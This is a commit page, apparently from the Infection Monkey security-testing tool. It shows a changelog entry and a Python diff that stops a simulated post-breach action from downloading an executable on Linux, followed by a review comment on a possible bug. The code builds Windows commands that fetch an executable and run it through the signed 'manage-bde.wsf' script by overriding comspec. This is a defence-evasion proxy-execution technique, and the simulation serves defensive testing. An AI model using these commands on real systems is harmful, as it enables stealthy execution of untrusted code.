Agent: Don't download exe on Linux during signed script PBA execution

This commit is contained in:
Shreya Malviya 2021-11-12 18:28:04 +05:30 committed by GitHub
parent 9f4bf71976
commit 59e7ac34f7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 14 additions and 5 deletions


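--- a/<changelog-path-not-shown>
+++ b/<changelog-path-not-shown>
@@ -21,6 +21,8 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
 ### Fixed
 - A bug in network map page that caused delay of telemetry log loading. #1545
 - Windows "run as a user" powershell command for manual agent runs. #1570
+- A bug in the "Signed Script Proxy Execution" PBA that downloaded the exe on Linux
+systems as well. #1557
 ### Security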


@ -1,22 +1,29 @@
import os import os
from infection_monkey.control import ControlClient from infection_monkey.control import ControlClient
from infection_monkey.utils.environment import is_windows_os
TEMP_COMSPEC = os.path.join(os.getcwd(), "T1216_random_executable.exe") TEMP_COMSPEC = os.path.join(os.getcwd(), "T1216_random_executable.exe")
def get_windows_commands_to_proxy_execution_using_signed_script(): def get_windows_commands_to_proxy_execution_using_signed_script():
download = ControlClient.get_T1216_pba_file() signed_script = ""
with open(TEMP_COMSPEC, "wb") as random_exe_obj:
random_exe_obj.write(download.content)
random_exe_obj.flush()
if is_windows_os():
_download_random_executable()
windir_path = os.environ["WINDIR"] windir_path = os.environ["WINDIR"]
signed_script = os.path.join(windir_path, "System32", "manage-bde.wsf") signed_script = os.path.join(windir_path, "System32", "manage-bde.wsf")
return [f"set comspec={TEMP_COMSPEC} &&", f"cscript {signed_script}"] return [f"set comspec={TEMP_COMSPEC} &&", f"cscript {signed_script}"]
def _download_random_executable():
download = ControlClient.get_T1216_pba_file()
with open(TEMP_COMSPEC, "wb") as random_exe_obj:
random_exe_obj.write(download.content)
random_exe_obj.flush()
def get_windows_commands_to_reset_comspec(original_comspec): def get_windows_commands_to_reset_comspec(original_comspec):
return f"set comspec={original_comspec}" return f"set comspec={original_comspec}"
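Review bot: The two lines `windir_path = os.environ["WINDIR"]` and `signed_script = os.path.join(windir_path, "System32", "manage-bde.wsf")` are unchanged context in this hunk, so as far as the rendering (which has lost indentation) shows they still run unconditionally after the new `if is_windows_os():` block; on a Linux host, where `WINDIR` is normally unset, that `os.environ["WINDIR"]` lookup raises `KeyError` before the return, and the new `signed_script = ""` initialisation is always overwritten. If the intent is for the function to return harmlessly off-Windows, those two lines should move under the branch, e.g. `if is_windows_os():` / `    _download_random_executable()` / `    signed_script = os.path.join(os.environ["WINDIR"], "System32", "manage-bde.wsf")`, which makes the `""` fallback meaningful. Separately, `_download_random_executable` writes `download.content` to `TEMP_COMSPEC` without checking that the fetch succeeded; `ControlClient.get_T1216_pba_file` is not visible here, but if it can return a failed response the file would silently hold an error body rather than the executable, so a status check before the write (a `raise_for_status()`-style guard, if the returned object supports one) would be prudent. A one-line docstring on the helper, such as `"""Fetch the T1216 executable via ControlClient and write it to TEMP_COMSPEC."""`, would also help.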